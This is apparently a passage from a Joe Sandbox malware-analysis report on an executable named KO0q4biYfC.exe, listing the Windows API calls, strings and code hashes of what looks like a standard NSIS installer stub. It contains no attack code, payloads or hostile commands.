                                              • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403492,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 00405CC3
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403492,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 00405CCD
                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,?,0000000A), ref: 00405CDF
                                              Strings
                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CBD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                              • API String ID: 2659869361-2382934351
                                              • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                              • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                              • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                              • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                              APIs
                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405D76
                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405E1E
                                              • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00405E2E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID: 0_B
                                              • API String ID: 3248276644-2128305573
                                              • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                              • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                              • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                              • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                              • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                              • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                              • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                              Strings
                                              • Error launching installer, xrefs: 004059E4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                              • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                              • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                              • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                              APIs
                                              • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,00403A1A,771B3420,00403819,00000006,?,00000006,?,0000000A), ref: 00403A5D
                                              • GlobalFree.KERNEL32(?), ref: 00403A64
                                              Strings
                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403A55
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Free$GlobalLibrary
                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                              • API String ID: 1100898210-2382934351
                                              • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                              • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                              • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                              • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                              APIs
                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KO0q4biYfC.exe,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405D0F
                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KO0q4biYfC.exe,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405D1F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrlen
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 2709904686-3976562730
                                              • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                              • Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
                                              • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                              • Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC
                                              APIs
                                              • GlobalAlloc.KERNEL32(?,?), ref: 73C6116A
                                              • GlobalFree.KERNEL32(00000000), ref: 73C611C7
                                              • GlobalFree.KERNEL32(00000000), ref: 73C611D9
                                              • GlobalFree.KERNEL32(?), ref: 73C61203
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                              • Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: 52a0786c95fe2aefd0dba167c84acd1cbf890f4bece9d19b0d0066aca95283c1
                                              • Instruction ID: b4e5a1c3748149d8907a9bd62634eef7901b60e3e4efb049dc45edc8a7f5522e
                                              • Opcode Fuzzy Hash: 52a0786c95fe2aefd0dba167c84acd1cbf890f4bece9d19b0d0066aca95283c1
                                              • Instruction Fuzzy Hash: 413181F2904211DFE700EF67C985B257BF8EB45212B250519E94ADF294E736DD0187A0
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                              • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                              • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98
                                              APIs
                                              • SetErrorMode.KERNEL32 ref: 004034C8
                                              • GetVersion.KERNEL32 ref: 004034CE
                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                              • #17.COMCTL32(?,00000006,?,0000000A), ref: 0040353E
                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,?,00000000), ref: 00403561
                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,?,0000000A), ref: 00403576
                                              • CharNextW.USER32(00000000,00435000,?,00435000,00000000,?,00000006,?,0000000A), ref: 004035AE
                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                              • GetTempPathW.KERNEL32(?,00437800,?,00000006,?,0000000A), ref: 004036E8
                                              • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,?,0000000A), ref: 004036F9
                                              • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,?,0000000A), ref: 00403705
                                              • GetTempPathW.KERNEL32(?,00437800,00437800,\Temp,?,00000006,?,0000000A), ref: 00403719
                                              • lstrcatW.KERNEL32(00437800,Low,?,00000006,?,0000000A), ref: 00403721
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,?,0000000A), ref: 00403732
                                              • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,?,0000000A), ref: 0040373A
                                              • DeleteFileW.KERNEL32(00437000,?,00000006,?,0000000A), ref: 0040374E
                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                              • OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403819
                                              • ExitProcess.KERNEL32 ref: 0040383A
                                              • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040384D
                                              • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040385C
                                              • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403867
                                              • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403873
                                              • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,?,0000000A), ref: 0040388F
                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?,?,00000006,?,0000000A), ref: 004038E9
                                              • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,?,0000000A), ref: 004038FD
                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,?,0000000A), ref: 0040392A
                                              • GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403959
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                              • ExitProcess.KERNEL32 ref: 004039E0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                              • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                              • API String ID: 3441113951-334447862
                                              • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                              • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                              • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                              • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                              • GetDlgItem.USER32(?,?), ref: 00404DEF
                                              • GlobalAlloc.KERNEL32(?,?), ref: 00404E39
                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                              • SetWindowLongW.USER32(?,?,004053C4), ref: 00404E65
                                              • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404E79
                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                              • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404EBF
                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                              • GetWindowLongW.USER32(?,?), ref: 00404FFD
                                              • SetWindowLongW.USER32(?,?,00000000), ref: 0040500B
                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00405193
                                              • SendMessageW.USER32(?,?,00000000,?), ref: 004051B7
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 1638840714-813528018
                                              • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                              • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                              • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                              • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                              APIs
                                              • DeleteFileW.KERNEL32(?,?,00437800,771B2EE0,00000000), ref: 00405B23
                                              • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405B6B
                                              • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405B8E
                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405B94
                                              • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405BA4
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: 0WB$\*.*
                                              • API String ID: 2035342205-351390296
                                              • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                              • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                              • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                              • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
